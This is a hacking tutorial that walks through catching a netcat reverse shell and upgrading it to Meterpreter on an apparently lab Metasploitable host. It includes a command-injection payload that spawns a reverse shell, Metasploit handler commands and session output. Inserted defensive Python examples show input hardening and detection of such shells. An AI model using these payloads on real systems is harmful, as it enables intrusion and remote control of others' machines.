
How to Upgrade a Netcat Shell to a Meterpreter Session for More Power and Control «Null Byte :: WonderHowTo



Popping a shell is often a hacker's main goal and is exciting when it works, but plain shells have their limitations. Metasploit's Meterpreter needs no introduction: this powerful, dynamic payload is a step above an ordinary shell. To show why, we'll upgrade a plain command shell to a Meterpreter session.

Shell vs. Meterpreter

A shell is basically an interface that gives access to the commands of an operating system. In hacking, two types of shell come up most often: bind shells and reverse shells.

A bind shell listens on a specific port on the target; the attacking system connects to that listening port and a session is created. A reverse shell, on the other hand, initiates the connection from the target back to the attacking machine, where a listener waits for incoming connections.

Command shells are a great way to get a foothold on the target, but they are not always the best option. They are typically limited to the privileges of the user who spawned the shell, so functionality that needs root-level access is not always available.

Meterpreter lets us run post-exploitation modules and local exploits on the target after the initial compromise. It communicates over an encrypted channel and writes nothing to disk while it runs, which makes it a stealthy tool that leaves little evidence behind. Meterpreter offers many other features and is highly extensible, making it an excellent addition to any hacker's arsenal.

Step 1: Start a Listener

First, start Metasploit by typing msfconsole in the terminal; once it has loaded we're greeted by a welcome banner. We'll use one of Metasploit's great features: a universal listener that can catch many different kinds of shell. To load the module, type the following:

  use exploit/multi/handler

Next, set the listening host and port to the IP address of our local machine and any port number. We also need to set the payload; the versatile reverse TCP shell is a good choice.

  msf5 exploit(multi/handler) > set lhost 172.16.1.100
  lhost => 172.16.1.100
  msf5 exploit(multi/handler) > set lport 1234
  lport => 1234
  msf5 exploit(multi/handler) > set payload linux/x86/shell/reverse_tcp
  payload => linux/x86/shell/reverse_tcp

Type options at the prompt to verify that our settings are correct.

  msf5 exploit(multi/handler) > options

  Module options (exploit/multi/handler):

     Name  Current Setting  Required  Description
     ----  ---------------  --------  -----------

  Payload options (linux/x86/shell/reverse_tcp):

     Name   Current Setting  Required  Description
     ----   ---------------  --------  -----------
     LHOST  172.16.1.100     yes       The listen address (an interface may be specified)
     LPORT  1234             yes       The listen port

  Exploit target:

     Id  Name
     --  ----
     0   Wildcard Target

Everything looks good. Type run to start the handler; it is now waiting for an incoming connection.

  msf5 exploit(multi/handler) > run

  [*] Started reverse TCP handler on 172.16.1.100:1234

Step 2: Get a Shell with Netcat

Netcat is a versatile networking utility that is often used to troubleshoot connectivity issues, but it can also be used to spawn command shells as a backdoor. Here we'll use it together with a command injection vulnerability to create a shell and connect back to our local machine. If all goes well, the handler we just set up catches the shell and we can issue commands.

The vulnerability lets us append system commands to the input of a web application's ping utility.

  127.0.0.1 && nc 172.16.1.100 1234 -e /bin/sh

Here we used Netcat to spawn a shell (-e /bin/sh) and connect back to our local machine on port 1234.
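The bug that makes this possible is the web application gluing user input into a shell command string. As an added example (not code from the original article, and not the vulnerable application it was run against), the following shows that pattern beside a hardened version: the target is validated as an IP address or hostname and then passed to ping as a single argv element, so shell metacharacters such as `&&` never reach a shell. The function names and sample inputs are constructed for illustration.

```python
"""Command injection in a 'ping' web utility: the vulnerable form beside a hardened one.

Added example, not code from the original article. The function names and the
sample inputs below are constructed for illustration.
"""
import ipaddress
import re
import subprocess
from typing import List, Optional

# Hostname grammar (RFC 1123 labels): letters, digits, hyphens, dot-separated,
# no label starting or ending with a hyphen, 253 characters in total at most.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)"
    r"([A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)*"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$"
)


def vulnerable_ping_command(target: str) -> str:
    """The classic bug: user input is concatenated into a shell command string.

    With the input '127.0.0.1 && nc 172.16.1.100 1234 -e /bin/sh' the shell runs
    the ping and then a second, attacker-chosen command as the web server user.
    The string is returned rather than executed so this example is safe to run;
    the real application would hand it to subprocess.run(..., shell=True).
    """
    return "ping -c 1 " + target


def validate_target(target: str) -> Optional[str]:
    """Return the target if it is a syntactically valid IP address or hostname, else None."""
    try:
        return str(ipaddress.ip_address(target))
    except ValueError:
        pass
    if _HOSTNAME_RE.match(target):
        return target
    return None


def hardened_ping_argv(target: str) -> Optional[List[str]]:
    """Build an argv list (no shell) for a validated target; None means reject."""
    host = validate_target(target)
    if host is None:
        return None
    # argv form: the target is one argument that no shell re-parses, so
    # '&&', ';', '|' or backticks have no special meaning. The validator also
    # guarantees the value cannot start with '-', so it cannot become an option.
    return ["ping", "-c", "1", host]


def run_ping(target: str) -> Optional["subprocess.CompletedProcess[str]"]:
    """Execute the hardened command; returns None when the input was rejected."""
    argv = hardened_ping_argv(target)
    if argv is None:
        return None
    return subprocess.run(argv, capture_output=True, text=True, timeout=10)


if __name__ == "__main__":
    injected = "127.0.0.1 && nc 172.16.1.100 1234 -e /bin/sh"
    print("vulnerable command string:", vulnerable_ping_command(injected))
    print("hardened argv for injected input:", hardened_ping_argv(injected))
    print("hardened argv for 127.0.0.1:", hardened_ping_argv("127.0.0.1"))
    try:
        result = run_ping("127.0.0.1")
        print("ping exit status:", None if result is None else result.returncode)
    except FileNotFoundError:
        print("ping binary not available on this system")
```

The validator rejects the injected string outright, so a hardened application never gets as far as building a command for it; logging such rejections is also a cheap, high-signal detection of injection attempts.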

After a moment, the terminal running our handler shows that a session has opened. We can now issue commands such as id and uname -a to confirm.

  [*] Sending stage (36 bytes) to 172.16.1.102
  [*] Command shell session 1 opened (172.16.1.100:1234 -> 172.16.1.102:53462) at 2019-01-29 15:28:28 -0600

  id
  uid=33(www-data) gid=33(www-data) groups=33(www-data)
  uname -a
  Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

Finally, we need to background this session with Ctrl-Z and confirm with y.

  ^Z
  Background session 1? [y/N]  y
  msf5 exploit(multi/handler) >


Step 3: Upgrade the Shell to a Meterpreter Session

Now that we have a session on the target, we can upgrade this modest shell to a full Meterpreter session, which gives us far more flexibility when interacting with the target.

At the prompt, type sessions to list all currently open sessions. Below we see the session we opened earlier, along with its ID, shell type and connection information.

  msf5 exploit(multi/handler) > sessions

  Active sessions
  ===============

    Id  Name  Type             Information  Connection
    --  ----  ----             -----------  ----------
    1         shell x86/linux               172.16.1.100:1234 -> 172.16.1.102:53462 (172.16.1.102)

The easiest way to upgrade a regular shell session to a Meterpreter session is the -u flag. Issue the sessions command with the appropriate ID and watch the magic happen.

  msf5 exploit(multi/handler) > sessions -u 1
  [*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

  [*] Upgrading session ID: 1
  [*] Starting exploit/multi/handler
  [*] Started reverse TCP handler on 172.16.1.100:4433
  [*] Sending stage (914728 bytes) to 172.16.1.102
  [*] Meterpreter session 2 opened (172.16.1.100:4433 -> 172.16.1.102:42790) at 2019-01-29 15:30:28 -0600
  [*] Command stager progress: 100.00% (773/773 bytes)

It looks as if nothing has happened, but a Meterpreter session is now open in the background; the upgrade does not drop us into it automatically. If we issue the sessions command again, our new Meterpreter session with ID 2 is listed, and we can use the -i flag to interact with it.
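From the defender's side, both steps above leave distinct footprints: the web server account spawning netcat with -e (Step 2), and then the same host opening a second outbound connection to the same address on a new port (4433 here) and pulling a stage of roughly 914 KB (the upgrade). As an added example (not code from the original article, and not tied to any particular EDR or flow product), the following runs two such checks over constructed host and network telemetry; the record layout, account and parent-process lists, thresholds and sample events are all assumptions to be adapted to your own schema.

```python
"""Spotting the netcat shell and its Meterpreter upgrade in host and network telemetry.

Added example, not from the original article. The record format, thresholds and the
sample events below are constructed; adapt the field names to your own EDR/flow schema.
"""
import os
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

SERVICE_ACCOUNTS = {"www-data", "apache", "nginx", "http"}          # assumed account names
WEB_PARENTS = {"apache2", "httpd", "nginx", "php", "php-cgi", "php-fpm"}
# nc/ncat/netcat with -e or -c hands a program (usually a shell) the socket.
NC_EXEC_RE = re.compile(r"\b(?:nc|ncat|netcat)\b.*\s-[ec]\s")
STAGE_BYTES = 500_000      # the shell_to_meterpreter stage in the article is ~914 KB
WINDOW_SECONDS = 600       # how long after the first channel a second one is suspicious


@dataclass
class ProcEvent:
    ts: int
    host: str
    user: str
    parent: str
    cmdline: str


@dataclass
class ConnEvent:
    ts: int
    src: str
    dst: str
    dport: int
    bytes_in: int   # bytes the internal host received on this connection


def detect_shell_spawn(events: List[ProcEvent]) -> List[str]:
    """Flag netcat-with-exec anywhere, and shells spawned by a web server under a service account."""
    alerts = []
    for e in events:
        parts = e.cmdline.split()
        argv0 = os.path.basename(parts[0]) if parts else ""
        if NC_EXEC_RE.search(e.cmdline):
            alerts.append(f"{e.host}: netcat exec shell by {e.user}: {e.cmdline}")
        elif e.user in SERVICE_ACCOUNTS and e.parent in WEB_PARENTS and argv0 in {"sh", "bash", "dash"}:
            # Noisy on applications that legitimately shell out; tune per application.
            alerts.append(f"{e.host}: web process {e.parent} spawned a shell: {e.cmdline}")
    return alerts


def detect_stage_download(conns: List[ConnEvent]) -> List[str]:
    """Flag a host that, having recently connected to an address, opens a second
    connection to the same address on a different port and receives a large blob."""
    seen: Dict[Tuple[str, str], List[Tuple[int, int]]] = {}   # (src, dst) -> [(ts, dport)]
    alerts = []
    for c in sorted(conns, key=lambda c: c.ts):
        key = (c.src, c.dst)
        earlier = [p for t, p in seen.get(key, []) if c.ts - t <= WINDOW_SECONDS and p != c.dport]
        if earlier and c.bytes_in >= STAGE_BYTES:
            alerts.append(
                f"{c.src}: second channel to {c.dst}:{c.dport} after port(s) "
                f"{sorted(set(earlier))}, received {c.bytes_in} bytes (possible stage)"
            )
        seen.setdefault(key, []).append((c.ts, c.dport))
    return alerts


# Constructed sample telemetry loosely following the article's timeline (shell, then upgrade).
SAMPLE_PROCS = [
    ProcEvent(1548797300, "metasploitable", "www-data", "apache2",
              "/bin/sh -c ping -c 1 127.0.0.1 && nc 172.16.1.100 1234 -e /bin/sh"),
    ProcEvent(1548797308, "metasploitable", "www-data", "sh", "nc 172.16.1.100 1234 -e /bin/sh"),
    ProcEvent(1548797400, "metasploitable", "root", "cron", "/usr/sbin/logrotate /etc/logrotate.conf"),
]
SAMPLE_CONNS = [
    ConnEvent(1548797308, "172.16.1.102", "172.16.1.100", 1234, 36),        # shell channel
    ConnEvent(1548797420, "172.16.1.102", "172.16.1.100", 4433, 914728),    # stage download
    ConnEvent(1548797500, "172.16.1.102", "10.0.0.5", 443, 1_200_000),      # large but no prior channel
]

if __name__ == "__main__":
    for line in detect_shell_spawn(SAMPLE_PROCS) + detect_stage_download(SAMPLE_CONNS):
        print("ALERT", line)
```

The process check fires on the injected command itself and again on the netcat child; the connection check fires only on the 4433 channel, because the third connection, although large, has no earlier sibling to the same address. In practice the two alerts should be correlated on host and time so that a staged payload following a shell spawn is scored higher than either on its own.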

  msf5 exploit(multi/handler) > sessions -i 2
  [*] Starting interaction with 2...

  meterpreter >

And now we have a Meterpreter shell. There is another way to upgrade a normal shell to a Meterpreter session that is similar to the method above: running the shell_to_meterpreter post-exploitation module manually.

Alternative Method to Upgrade the Shell to a Meterpreter Session

To load the module, type the following:

  use post/multi/manage/shell_to_meterpreter

The only option we need to set is the existing session we want to upgrade. After that we can display the current settings with the options command.

  msf5 post(multi/manage/shell_to_meterpreter) > set session 1
  session => 1
  msf5 post(multi/manage/shell_to_meterpreter) > options

  Module options (post/multi/manage/shell_to_meterpreter):

     Name     Current Setting  Required  Description
     ----     ---------------  --------  -----------
     HANDLER  true             yes       Start an exploit/multi/handler to receive the connection
     LHOST                     no        IP of host that will receive the connection from the payload (will try to auto detect).
     LPORT    4433             yes       Port for payload to connect to.
     SESSION  1                yes       The session to run this module on.

Type run to start it.

  msf5 post(multi/manage/shell_to_meterpreter) > run

  [*] Upgrading session ID: 1
  [*] Starting exploit/multi/handler
  [*] Started reverse TCP handler on 172.16.1.100:4433
  [*] Sending stage (914728 bytes) to 172.16.1.102
  [*] Meterpreter session 3 opened (172.16.1.100:4433 -> 172.16.1.102:59832) at 2019-01-29 15:34:16 -0600
  [*] Command stager progress: 100.00% (773/773 bytes)
  [*] Post module execution completed

Again, the new session opens in the background, so we issue the sessions command to find its ID.

  msf5 post(multi/manage/shell_to_meterpreter) > sessions

  Active sessions
  ===============

    Id  Name  Type                   Information  Connection
    --  ----  ----                   -----------  ----------
    1         shell x86/linux                     172.16.1.100:1234 -> 172.16.1.102:53462 (172.16.1.102)
    3         meterpreter x86/linux               172.16.1.100:4433 -> 172.16.1.102:59832 (172.16.1.102)

We can see that the new Meterpreter session has ID 3. Now we can interact with it.

  msf5 post(multi/manage/shell_to_meterpreter) > sessions -i 3
  [*] Starting interaction with 3...

  meterpreter >

We now have a Meterpreter shell, and from here the sky is the limit.

Wrapping Up

In this tutorial, we learned how to take a plain old command shell and upgrade it to a Meterpreter session. We used a Netcat shell here, but any other kind of shell should work with this method. Meterpreter offers a great deal of power and control over a target, so go forth and carry on.

Cover image by StockSnap/Pixabay; screenshots by drd_/Null Byte
